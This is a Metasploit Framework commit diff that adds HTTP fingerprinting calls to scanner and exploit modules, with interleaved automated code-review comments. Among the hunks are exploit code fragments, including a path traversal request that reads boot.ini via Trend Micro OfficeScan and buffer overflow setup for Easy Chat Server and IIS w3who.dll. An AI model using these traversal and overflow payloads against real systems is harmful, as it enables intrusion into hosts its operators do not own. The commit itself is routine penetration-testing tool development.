add http_fingerprint calls to modules that use various headers

git-svn-id: file:///home/svn/framework3/trunk@9627 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-25 20:53:12 +00:00
parent 2ab5983e2a
commit 12fbdcd878
16 changed files with 167 additions and 133 deletions


@ -42,10 +42,13 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
}, 25)
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/',
}, 25)
http_fingerprint({ :response => res })
if (res and res.code == 200)
@ -133,4 +136,3 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
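Review bot: `http_fingerprint({ :response => res })` runs before the `if (res and res.code == 200)` guard, so when send_request_raw returns nil on a timeout or refused connection the fingerprinter receives a nil response; whether that is safe depends on how http_fingerprint treats a nil `:response`, which is not visible here. If it does not tolerate nil the guard comes one line too late, and if it falls back to issuing its own request on nil the scan quietly sends a second probe per host. The same ordering appears in the Tomcat manager, SecurityGateway and both TikiWiki check hunks, and most visibly in the later `check`/`auto_target` hunks that follow `http_fingerprint({ :response => response })` with `if response.nil?`. Moving the call inside the guard, or writing `http_fingerprint({ :response => res }) if res`, limits the fingerprint call to real responses. run_host continues past the hunk.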


@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -23,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
'Version' => '$Revision$',
'Description' => %q{
This module tests for directory traversal vulnerability in the UpdateAgent
This module tests for directory traversal vulnerability in the UpdateAgent
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
via dot dot sequences in an HTTP request.
@ -40,17 +38,20 @@ class Metasploit3 < Msf::Auxiliary
)
register_options(
[
Opt::RPORT(26122),
], self.class)
[
Opt::RPORT(26122),
], self.class)
end
def run_host(target_host)
res = send_request_raw({
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
'method' => 'GET',
}, 20)
res = send_request_raw(
{
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
'method' => 'GET',
}, 20)
http_fingerprint({ :response => res })
if (res.code >= 200)
if (res.body =~ /boot/)
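Review bot: `if (res.code >= 200)` dereferences `res` with no nil check, so a host that times out or refuses the connection raises NoMethodError out of run_host instead of being skipped; the commit reformats the request just above but leaves this as it was. Adding `return if not res` after the fingerprint call (matching the guard style used elsewhere in these modules) closes it. The JBoss scanner hunk has the same gap at `if(res.body and ...)`. run_host continues outside the hunk.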


@ -22,10 +22,14 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'JBoss Vulnerability Scanner',
'Description' => %q{
This module scans a JBoss instance for vulnerablities.
This module scans a JBoss instance for a few vulnerablities.
},
'Version' => '$Revision$',
'Author' => [ 'Tyler Krpata' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => BSD_LICENSE
))
@ -39,14 +43,16 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
print_status("Processing IP #{ip}")
res = send_request_cgi({
'uri' => "/"+Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (xpb = res.headers['X-Powered-By'])
print_status("X-Powered-By: #{xpb}")
end
res = send_request_cgi(
{
'uri' => "/"+Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
info = http_fingerprint({ :response => res })
print_status(info)
if(res.body and />(JBoss[^<]+)/.match(res.body) )
print_status("JBoss error message: #{$1}")
end
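Review bot: `print_status(info)` prints whatever `http_fingerprint` returns with no label and no nil guard, so a host with nothing recognizable presumably yields a bare or empty status line (what http_fingerprint returns when it matches nothing is not visible here). `print_status("Fingerprint: #{info}") if info` keeps the output labelled and skips the empty case. On the following line `$1` after `.match` works but `Regexp.last_match(1)` or a named capture reads more clearly. run_host continues past the hunk.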


@ -67,12 +67,16 @@ class Metasploit3 < Msf::Auxiliary
get_source = Rex::Text.uri_encode("::$data")
begin
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{uri}#{get_source}",
}, 25)
res = send_request_raw(
{
'method' => 'GET',
'uri' => "/#{uri}#{get_source}",
}, 25)
version = res.headers['Server'] if res
if res
version = res.headers['Server']
http_fingerprint({ :response => res })
end
if vuln_versions.include?(version)
print_good("#{target_url} - nginx - Vulnerable version: #{version}")


@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
'uri' => "/manager/html",
'method' => 'GET'
}, 25)
http_fingerprint({ :response => res })
rescue ::Rex::ConnectionError => e
vprint_error("http://#{rhost}:#{rport}/manager/html - #{e}")
return


@ -43,6 +43,8 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200
http_fingerprint({ :response => res })
tserver = res.headers['Server']
if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
@ -54,12 +56,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED")
report_note(
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => wdtype,
:data => 'enabled'
)
{
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => wdtype,
:data => 'enabled'
})
else
print_status("#{target_host} (#{tserver}) WebDAV disabled.")
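Review bot: `res.headers['MS-Author-Via'].match('DAV')` on the context line raises NoMethodError whenever a server advertises `DAV: 1, 2` without an `MS-Author-Via` header, since the `and` only short-circuits when the DAV value differs; the commit touches this branch but leaves the check as it was. `res.headers['MS-Author-Via'].to_s.match('DAV')` (or `=~ /DAV/`) makes the test tolerate a missing header. The enclosing run_host begins outside the hunk.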


@ -117,21 +117,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'HTTP',
'version' => '1.0',
'uri' => datastore['PATH']
}, 5)
res = send_request_raw({
'method' => 'OPTIONS',
'proto' => 'HTTP',
'version' => '1.0',
'uri' => datastore['PATH']
}, 5)
if res and res['Server']
print_status("Found server: #{res['Server']}")
info = http_fingerprint({ :response => res })
if (info =~ /Sun/)
print_status("Found server: #{info}")
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
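Review bot: The rewritten `check` removes the `if res and res['Server']` guard, so correctness now rests on `http_fingerprint` coping with a nil response (not visible here) and on `info =~ /Sun/` tolerating nil, which Ruby does allow. `/Sun/` is also unanchored and case-sensitive, so any fingerprint containing that substring reports Detected; a pattern naming the specific product the module targets would cut false positives. A one-line comment above the regex stating which server string it is meant to match would make the intent reviewable.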


@ -236,6 +236,8 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Safe
end
http_fingerprint({ :response => res })
if (res.code != 200)
print_status("The server returned #{res.code} #{res.message}")
return Exploit::CheckCode::Safe


@ -32,15 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2002-1643' ],
[ 'OSVDB', '4468'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html']
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
},
'Targets' =>
[
@ -56,19 +54,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
'method' => 'OPTIONS',
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
res = send_request_raw(
{
'method' => 'OPTIONS',
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
info = http_fingerprint({ :response => res })
if res and res['Server']
print_status("Found RTSP: #{res['Server']}")
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Safe
end
def exploit
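Review bot: `info = http_fingerprint({ :response => res })` assigns a local that the rest of `check` never reads; the branch still keys off `res['Server']`. Either drop the assignment, `http_fingerprint({ :response => res })`, or use `info` in the status line. Note also that this response answers an RTSP `OPTIONS` request (`'proto' => 'RTSP'`), so the HTTP-oriented fingerprinter is being fed a non-HTTP reply; whether its result is meaningful here is not visible from the hunk, and a brief comment saying so would help the next reader.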


@ -61,17 +61,20 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
res = send_request_raw(
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 5)
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 5)
if (res and res.message == "OK" and res.body.match(/TikiWiki v?([0-9\.]*)/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
ver = $1
#print_status("Detected TikiWiki version #{ver}")
ver = ver.split('.')
@ -89,8 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit


@ -62,21 +62,23 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
res = send_request_raw({
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
res = send_request_raw(
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
'uri' => datastore['URI'] + "/tiki-index.php",
'method' => 'GET',
'headers' =>
{
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Connection' => 'Close',
}
}, 25)
if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
http_fingerprint({ :response => res })
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit


@ -81,6 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/SecurityGateway.dll'
}, 10)
http_fingerprint({ :response => res })
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
case $1
when /1\.0\.1/
@ -98,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
# handle auto-targeting
mytarget = target
if target.name =~ /Automatic/
mytarget = auto_target
if mytarget.nil?
raise RuntimeError, "Unable to automatically select a target"


@ -161,6 +161,8 @@ class Metasploit3 < Msf::Exploit::Remote
def check
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
if response.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
@ -194,6 +196,9 @@ class Metasploit3 < Msf::Exploit::Remote
def auto_target
response = send_request_raw({'uri' => '/'}, 5)
http_fingerprint({ :response => response })
targets_to_try = []
if response.nil?


@ -57,21 +57,28 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Aug 14 2007',
'DefaultTarget' => 0))
register_options([
register_options(
[
Opt::RPORT(80),
OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
"C:\\Program Files\\Easy Chat Server" ])
], self.class )
end
def check
res = send_request_raw
def auto_target
info = http_fingerprint
t = nil
if (info =~ /Easy Chat Server\/1\.0/)
t = targets[0]
end
t
end
if res and res['Server'] =~ /Easy Chat Server\/1.0/
def check
if auto_target
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
@ -79,9 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
val = rand_text_alpha(rand(10) + 1)
num = rand_text_numeric(1)
# exploit buffer.
path = datastore['PATH'] + "\\users\\"
print_status("path: " + path)
# exploit buffer.
filler = rand_text_alpha(256 - path.length)
seh = generate_seh_payload(target.ret)
juju = filler + seh
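Review bot: `auto_target` builds its result through a `t = nil` / `if` / `t` sequence that Ruby expresses directly as `targets[0] if info =~ /Easy Chat Server\/1\.0/`, and `check` likewise as `auto_target ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe`. Because `http_fingerprint` is called here with no arguments, every `auto_target` call issues its own request; if `exploit` (outside the hunk) also calls it, the host is probed twice. A short comment on `auto_target` noting that it sends a request would make that cost visible to callers.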


@ -51,15 +51,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
response = send_request_raw
info = http_fingerprint
if response and
response['Server'] and
response['Server'] =~ /.*MailEnable/
if (info =~ /.*MailEnable/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
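Review bot: `info =~ /.*MailEnable/` carries a redundant leading `.*`; an unanchored match already scans the whole string, so `info =~ /MailEnable/` is equivalent and cheaper. With the multi-line guard gone, `check` reduces to `info =~ /MailEnable/ ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe`. As in the Easy Chat Server hunk, the argument-less `http_fingerprint` call issues its own request, which is worth a one-line comment.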


@ -9,10 +9,8 @@
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the w3who.dll ISAPI
This module exploits a stack buffer overflow in the w3who.dll ISAPI
application. This vulnerability was discovered Nicolas
Gregoire and this code has been successfully tested against
Windows 2000 and Windows XP (SP2). When exploiting Windows
@ -35,11 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1134'],
[ 'OSVDB', '12258'],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
[ 'BID', '11820'],
[ 'CVE', '2004-1134' ],
[ 'OSVDB', '12258' ],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
[ 'BID', '11820' ]
],
'Privileged' => false,
'DefaultOptions' =>
@ -64,44 +61,50 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 6 2004'))
register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self.class)
register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self.class)
end
def auto_target
res = send_request_raw(
{
'uri' => datastore['URL']
}, -1)
http_fingerprint({ :response => res })
# Was a vulnerable system detected?
t = nil
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
t = targets[2]
else
t = targets[1]
end
end
t
end
def check
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /Access Token/)
if auto_target
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
else
mytarget = target
end
if(mytarget.name =~ /Automatic/)
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
mytarget = targets[2]
else
mytarget = targets[1]
end
else
print_error("No valid target found")
end
if not mytarget
raise RuntimeError, "No valid target found"
end
buf = rand_text_english(8192, payload_badchars)
@ -120,4 +123,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end